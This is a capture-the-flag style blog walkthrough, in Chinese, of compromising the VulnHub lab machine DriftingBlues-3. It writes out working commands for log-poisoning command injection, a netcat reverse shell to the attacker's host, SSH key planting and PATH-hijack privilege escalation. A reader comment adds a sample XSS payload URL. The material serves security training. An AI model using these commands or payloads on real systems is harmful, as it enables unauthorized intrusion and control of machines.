vuluhub靶机:driftingblues-3

一:主机发现

arp-scan -I eth0 10.9.23.0/24

二:端口扫描

nmap -T4 -sV -p- -A 10.9.23.180

三:端口探测

发现一张图片,没有其他发现

四:目录探测

dirb http://10.9.23.180

http://10.9.23.180/phpmyadmin/

得到一串abc

http://10.9.23.180/privacy/

得到一串ab

http://10.9.23.180/secret/

得到一串a

dirsearch -u http://10.9.23.180/

查看

10.9.23.180/robots.txt

发现一个目录

/eventadmins

/littlequeenofspades.html

查看源码发现base64编码

aW50cnVkZXI/IEwyRmtiV2x1YzJacGVHbDBMbkJvY0E9PQ==

解码得到

intruder? L2FkbWluc2ZpeGl0LnBocA==

继续解码

/adminsfixit.php

得到一个目录

可以看到这个文件可以获取 ssh auth log,所以可以尝试往日志文件写入一句话后门

五:漏洞利用

尝试登陆 SSH 写入 shell:

ssh ''@10.9.23.180

x指纹参数试试

试试反弹shell

在 kali 中开启监听:nc -lvp 6666
加入命令,访问 URL:
http://10.9.23.180/adminsfixit.php?x=nc 10.9.23.112 6666 -e /bin/bash
反弹 shell 成功

使用 Python 切换 bash:

python3 -c 'import pty;pty.spawn("/bin/bash")'

home目录下发现用户robertj

既然没有私钥秘钥,咱们生成一下

ssh-keygen -t rsa
将生成的私钥保存到
/home/robertj/.ssh/id_rsa

将 SSH 公钥文件另存为 authorized_keys,用于 SSH 登陆认证

python2 -m SimpleHTTPServer 9998

wget http://10.9.23.180:9998/id_rsa

将私钥复制到本地

nano id_rsa

chmod 755 id_rsa

chmod 400 id_rsa

ssh robertj@10.9.23.180 -i id_rsa

登录成功

得到第一个flag

六:提权

在 shell 中寻找 suid 程序:

find / -perm -u=s -type f 2>/dev/null

发现一个不常见的程序

/usr/bin/getinfo

根据上面输出的结果,可以推测这个程序中执行了

ip addr, cat /etc/hosts, uname -a
因此,在这种情况下,我们可以在环境变量 PATH 中提供一个目录 (/tmp),并创建一个 ip
或者 cat 文件,用于劫持命令,执行我们自定义的二进制文件就可以提权

export PATH=/tmp/:$PATH
cd /tmp
echo '/bin/bash' > ip
chmod +x ip
/usr/bin/getinfo

得到flag2,靶机结束

zzz@zzz-virtual-machine:/home/11/Chapter6/实战26 Django debug page XSS漏洞$ ip addr |grep "ens" 2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000 inet 192.168.20.128/24 brd 192.168.20.255 scope global dynamic noprefixroute ens33 zzz@zzz-virtual-machine:/home/11/Chapter6/实战26 Django debug page XSS漏洞$ sudo docker ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES 28512967cd9b 53-web "sh start.sh" 6 months ago Up 2 minutes 3306/tcp, 0.0.0.0:32778->80/tcp, [::]:32778->80/tcp 53-web-1 468c5ce44b7f 52-web "sh start.sh" 6 months ago Up 2 minutes 3306/tcp, 0.0.0.0:32776->80/tcp, [::]:32776->80/tcp 52-web-1 a4cd4ada371b 50-web "sh start.sh" 6 months ago Up 2 minutes 3306/tcp, 0.0.0.0:32768->80/tcp, [::]:32768->80/tcp 50-web-1 cd6bb0546e77 49-web "sh start.sh" 6 months ago Up 2 minutes 3306/tcp, 0.0.0.0:32780->80/tcp, [::]:32780->80/tcp 49-web-1 fa35b3f63758 48-web "sh start.sh" 6 months ago Up 2 minutes 3306/tcp, 0.0.0.0:32775->80/tcp, [::]:32775->80/tcp 48-web-1 833ba3202997 47-web "sh start.sh" 6 months ago Up 2 minutes 3306/tcp, 0.0.0.0:32782->80/tcp, [::]:32782->80/tcp 47-web-1 f0680c169983 33url-web "sh start.sh" 6 months ago Up 2 minutes 3306/tcp, 0.0.0.0:32774->80/tcp, [::]:32774->80/tcp 33url-web-1 86c93e38d1a5 31-session "sh start.sh" 6 months ago Up 2 minutes 3306/tcp, 0.0.0.0:32770->80/tcp, [::]:32770->80/tcp 31-session-1 e99029096ba8 29cors-web1 "sh start.sh" 6 months ago Up 2 minutes 0.0.0.0:32781->80/tcp, [::]:32781->80/tcp 29cors-web1-1 5f1a16022f28 29cors-web "sh start.sh" 6 months ago Up 2 minutes 3306/tcp, 0.0.0.0:32769->80/tcp, [::]:32769->80/tcp 29cors-web-1 86d4971a0939 28jsonhijacking-web1 "sh start.sh" 6 months ago Up 2 minutes 0.0.0.0:32783->80/tcp, [::]:32783->80/tcp 28jsonhijacking-web1-1 4e5663cc649e 28jsonhijacking-web "sh start.sh" 6 months ago Up 2 minutes 3306/tcp, 0.0.0.0:32777->80/tcp, [::]:32777->80/tcp 28jsonhijacking-web-1 7fef443e3c2b vulhub/django:1.11.4 "/docker-entrypoint.…" 6 months ago Up 32 seconds 0.0.0.0:32788->8000/tcp, [::]:32788->8000/tcp 26djangodebugpagexss-web-1 c99af8fd4285 postgres:9.6-alpine "docker-entrypoint.s…" 6 months ago Up 33 seconds 5432/tcp 26djangodebugpagexss-db-1 2e74f2bc0e5b 27csrf-web "sh start.sh" 6 months ago Up 2 minutes 3306/tcp, 0.0.0.0:32772->80/tcp, [::]:32772->80/tcp 27csrf-web-1 e893915ab8d2 23apache-web "sh start.sh" 6 months ago Up 2 minutes 3306/tcp, 0.0.0.0:32773->80/tcp, [::]:32773->80/tcp 23apache-web-1 72029170fdbd 22nginx-web "/docker-entrypoint.…" 6 months ago Up 2 minutes 0.0.0.0:32779->80/tcp, [::]:32779->80/tcp 22nginx-web-1 ecbabf507cc3 11djangogissql-web "/docker-entrypoint.…" 6 months ago Up 2 minutes 0.0.0.0:32787->8000/tcp, [::]:32787->8000/tcp 11djangogissql-web-1 d66225c67042 vulhub/oracle:12c-ee "/entrypoint.sh" 6 months ago Up 2 minutes 1521/tcp, 5500/tcp, 8080/tcp 11djangogissql-db-1 为什么我还是打不开:http://192.168.20.128:32787/create_user/?username=<script>alert(1)</script>
12-05
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值